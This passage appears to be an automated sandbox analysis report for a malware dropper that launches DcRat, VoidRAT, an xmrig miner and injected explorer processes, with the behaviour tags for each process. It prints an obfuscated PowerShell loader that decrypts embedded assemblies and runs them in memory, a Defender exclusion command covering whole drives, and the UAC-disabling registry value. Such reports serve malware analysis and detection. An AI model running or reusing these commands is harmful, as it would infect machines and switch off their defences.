cmd.exe reg.exe PID 3116 wrote to memory of 4044 3116 powershell.exe schtasks.exe PID 3116 wrote to memory of 4044 3116 powershell.exe schtasks.exe PID 4544 wrote to memory of 2928 4544 
4363463463464363463463463.exe iox.exe PID 4544 wrote to memory of 2928 4544 4363463463464363463463463.exe iox.exe PID 4544 wrote to memory of 4836 4544 4363463463464363463463463.exe %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe PID 4544 wrote to memory of 4836 4544 4363463463464363463463463.exe %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe PID 4544 wrote to memory of 4836 4544 4363463463464363463463463.exe %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe PID 4544 wrote to memory of 4312 4544 4363463463464363463463463.exe srr.exe PID 4544 wrote to memory of 4312 4544 4363463463464363463463463.exe srr.exe PID 4544 wrote to memory of 4312 4544 4363463463464363463463463.exe srr.exe PID 4312 wrote to memory of 4172 4312 srr.exe cmd.exe PID 4312 wrote to memory of 4172 4312 srr.exe cmd.exe PID 4312 wrote to memory of 4172 4312 srr.exe cmd.exe PID 1728 wrote to memory of 3888 1728 Ghxyq.exe Ghxyq.exe PID 1728 wrote to memory of 3888 1728 Ghxyq.exe Ghxyq.exe PID 1728 wrote to memory of 3888 1728 Ghxyq.exe Ghxyq.exe PID 4172 wrote to memory of 688 4172 cmd.exe PING.EXE PID 4172 wrote to memory of 688 4172 cmd.exe PING.EXE PID 4172 wrote to memory of 688 4172 cmd.exe PING.EXE PID 2792 wrote to memory of 408 2792 cmd.exe sc.exe PID 2792 wrote to memory of 408 2792 cmd.exe sc.exe PID 2792 wrote to memory of 1916 2792 cmd.exe sc.exe PID 2792 wrote to memory of 1916 2792 cmd.exe sc.exe PID 2792 wrote to memory of 1832 2792 cmd.exe sc.exe PID 2792 wrote to memory of 1832 2792 cmd.exe sc.exe PID 2792 wrote to memory of 1624 2792 cmd.exe sc.exe PID 2792 wrote to memory of 1624 2792 cmd.exe sc.exe PID 2792 wrote to memory of 5004 2792 cmd.exe sc.exe PID 2792 wrote to memory of 5004 2792 cmd.exe sc.exe PID 2792 wrote to memory of 2428 2792 cmd.exe reg.exe PID 2792 wrote to memory of 2428 2792 cmd.exe reg.exe PID 2792 wrote to memory of 
4828 2792 cmd.exe reg.exe PID 2792 wrote to memory of 4828 2792 cmd.exe reg.exe PID 2792 wrote to memory of 4196 2792 cmd.exe reg.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
InstallSetup2.exe
description ioc process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" InstallSetup2.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3352 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- DcRat
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe"C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\Files\iox.exe"C:\Users\Admin\AppData\Local\Temp\Files\iox.exe"3⤵
- Executes dropped EXE
PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 5404⤵
- Program crash
PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\srr.exe"C:\Users\Admin\AppData\Local\Temp\Files\srr.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\Files\srr.exe > nul4⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.15⤵
- Runs ping.exe
PID:688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\is-DSI8J.tmp\is-RKAFE.tmp"C:\Users\Admin\AppData\Local\Temp\is-DSI8J.tmp\is-RKAFE.tmp" /SL4 $A01CA "C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe" 9740347 522244⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:4972 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "UCR1163"5⤵PID:5048
-
-
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe"C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe" -i5⤵
- Executes dropped EXE
PID:4396
-
-
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe"C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe" -s5⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"3⤵
- Executes dropped EXE
PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PsLoggedon.exe"C:\Users\Admin\AppData\Local\Temp\Files\PsLoggedon.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\Files\._cache_PsLoggedon.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_PsLoggedon.exe"4⤵
- Executes dropped EXE
PID:3104 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 7965⤵
- Program crash
PID:4456
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Looks for VMWare services registry key.
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
PID:4288 -
C:\Users\Admin\AppData\Local\Temp\Files\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
PID:4768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 7966⤵
- Program crash
PID:3852
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵PID:5148
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:3844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 11327⤵
- Program crash
PID:5144
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵PID:5680
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:3968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 10927⤵
- Program crash
PID:5060
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:4112 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:4880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 11247⤵
- Program crash
PID:2944
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:1200 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:864 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 10767⤵
- Program crash
PID:4948
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:2664 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:3852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 10767⤵
- Program crash
PID:948
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:1800 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:2268 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 10847⤵
- Program crash
PID:3668
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:3484 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:4632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 10767⤵
- Program crash
PID:5368
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5216 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:5064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 10807⤵
- Program crash
PID:5148
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:1056 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:4000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 11327⤵
- Program crash
PID:2816
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5152 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:4888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 11367⤵
- Program crash
PID:3172
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:2500 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:5164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 10807⤵
- Program crash
PID:460
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:4816 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:2316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 11047⤵
- Program crash
PID:5388
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:920 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
PID:724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe"C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /syncid0_2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=4⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:688 -
C:\Program Files (x86)\1705419823_0\360TS_Setup.exe"C:\Program Files (x86)\1705419823_0\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /syncid0_2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall5⤵
- Looks for VMWare services registry key.
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4616
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VoidRAT.exe"C:\Users\Admin\AppData\Local\Temp\Files\VoidRAT.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"3⤵
- Executes dropped EXE
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\fortnite3.exe"C:\Users\Admin\AppData\Local\Temp\Files\fortnite3.exe"3⤵
- Executes dropped EXE
PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jxszdjp.exe"C:\Users\Admin\AppData\Local\Temp\Files\jxszdjp.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\Files\jxszdjpSrv.exeC:\Users\Admin\AppData\Local\Temp\Files\jxszdjpSrv.exe4⤵
- Executes dropped EXE
PID:2940 -
C:\Program Files (x86)\Microsoft\DesktopLayer.exe"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"5⤵
- Executes dropped EXE
PID:5076 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2400 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2400 CREDAT:17410 /prefetch:27⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3732
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"3⤵
- Executes dropped EXE
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\is-K0D0E.tmp\is-I2SOJ.tmp"C:\Users\Admin\AppData\Local\Temp\is-K0D0E.tmp\is-I2SOJ.tmp" /SL4 $10372 "C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe" 9527549 522244⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3872
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe"C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe"3⤵
- Executes dropped EXE
PID:3640 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1B8.tmp\1B9.tmp\1BA.bat C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe"4⤵PID:2080
-
C:\Windows\system32\fsutil.exefsutil dirty query C:5⤵PID:4876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"3⤵
- Executes dropped EXE
PID:4148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 14444⤵
- Program crash
PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2532 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe4⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
PID:3196 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd" "5⤵PID:1268
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd"6⤵PID:484
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd';$RfUL='SplstIeistIetstIe'.Replace('stIe', ''),'TrfmgKafmgKnfmgKsfmgKfofmgKrfmgKmFfmgKinafmgKlBfmgKlofmgKckfmgK'.Replace('fmgK', ''),'DecHsSjomHsSjpHsSjrHsSjessHsSj'.Replace('HsSj', ''),'EleBZnKmBZnKeBZnKntBZnKAtBZnK'.Replace('BZnK', ''),'ReGrwradGrwrLiGrwrnGrwreGrwrsGrwr'.Replace('Grwr', ''),'CIOLbopIOLbyIOLbTIOLboIOLb'.Replace('IOLb', ''),'FrpwLNompwLNBapwLNspwLNepwLN6pwLN4SpwLNtpwLNripwLNnpwLNgpwLN'.Replace('pwLN', ''),'LZaAAoZaAAaZaAAdZaAA'.Replace('ZaAA', ''),'IswsYnswsYvokswsYeswsY'.Replace('swsY', ''),'MayHpwinyHpwMoyHpwduyHpwleyHpw'.Replace('yHpw', ''),'EnfcpnnfcptrynfcpPnfcponfcpinnfcptnfcp'.Replace('nfcp', ''),'GKVjZetCKVjZurKVjZrKVjZenKVjZtPrKVjZocKVjZessKVjZ'.Replace('KVjZ', ''),'CmmRYhanmmRYgmmRYeExmmRYtenmmRYsmmRYimmRYonmmRY'.Replace('mmRY', ''),'CrewBkzatwBkzeDwBkzecwBkzrywBkzptwBkzowBkzrwBkz'.Replace('wBkz', '');powershell -w hidden;function HYZRs($YjbML){$FKFbd=[System.Security.Cryptography.Aes]::Create();$FKFbd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$FKFbd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$FKFbd.Key=[System.Convert]::($RfUL[6])('2M0fT7QfMAGeiJeE2Y8HU5skhkMH0OcAFA0SFzRHVws=');$FKFbd.IV=[System.Convert]::($RfUL[6])('Wv0CCTjoJ02lflet8TKTGg==');$qvWHS=$FKFbd.($RfUL[13])();$UQnTy=$qvWHS.($RfUL[1])($YjbML,0,$YjbML.Length);$qvWHS.Dispose();$FKFbd.Dispose();$UQnTy;}function tsjtk($YjbML){$KLabx=New-Object System.IO.MemoryStream(,$YjbML);$CeqVN=New-Object System.IO.MemoryStream;$OFOrH=New-Object System.IO.Compression.GZipStream($KLabx,[IO.Compression.CompressionMode]::($RfUL[2]));$OFOrH.($RfUL[5])($CeqVN);$OFOrH.Dispose();$KLabx.Dispose();$CeqVN.Dispose();$CeqVN.ToArray();}$xZSiw=[System.IO.File]::($RfUL[4])([Console]::Title);$VwJSg=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 5).Substring(2))));$NGyKN=tsjtk (HYZRs 
([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 6).Substring(2))));[System.Reflection.Assembly]::($RfUL[7])([byte[]]$NGyKN).($RfUL[10]).($RfUL[8])($null,$null);[System.Reflection.Assembly]::($RfUL[7])([byte[]]$VwJSg).($RfUL[10]).($RfUL[8])($null,$null); "7⤵PID:1464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵PID:528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵PID:1872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')8⤵PID:764
-
-
C:\Users\Admin\AppData\Local\Temp\tnydzrrq.mxi.exe"C:\Users\Admin\AppData\Local\Temp\tnydzrrq.mxi.exe"8⤵
- Executes dropped EXE
PID:448
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exeC:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe5⤵
- Executes dropped EXE
PID:940
-
-
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exeC:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe5⤵
- Executes dropped EXE
PID:1108
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exeC:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe4⤵
